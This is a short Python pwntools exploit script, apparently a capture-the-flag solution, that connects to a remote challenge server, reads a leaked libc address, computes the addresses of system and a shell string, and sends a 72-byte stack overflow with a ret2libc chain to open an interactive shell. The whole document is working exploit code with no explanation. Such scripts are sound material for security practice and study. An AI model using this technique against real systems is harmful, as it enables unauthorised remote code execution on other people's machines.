#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./poj", checksec=False)
# r = process()
r = remote("challenge.bugpwn.com", 1003)

# leak
r.recvuntil(b": ")
write = int(r.recvline().strip(), 16)
log.info("write: 0x%lx", write)
libc_base = write - 0xff4d0
log.info("libc: 0x%lx", libc_base)
system = libc_base + 0x4dab0
log.info("system: 0x%lx", system)
sh = libc_base + 0x197e34

# gadgets
pop_rdi = libc_base + 0x28215

# pop
buf = b"A"*72
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(system)
r.sendline(buf)

r.interactive()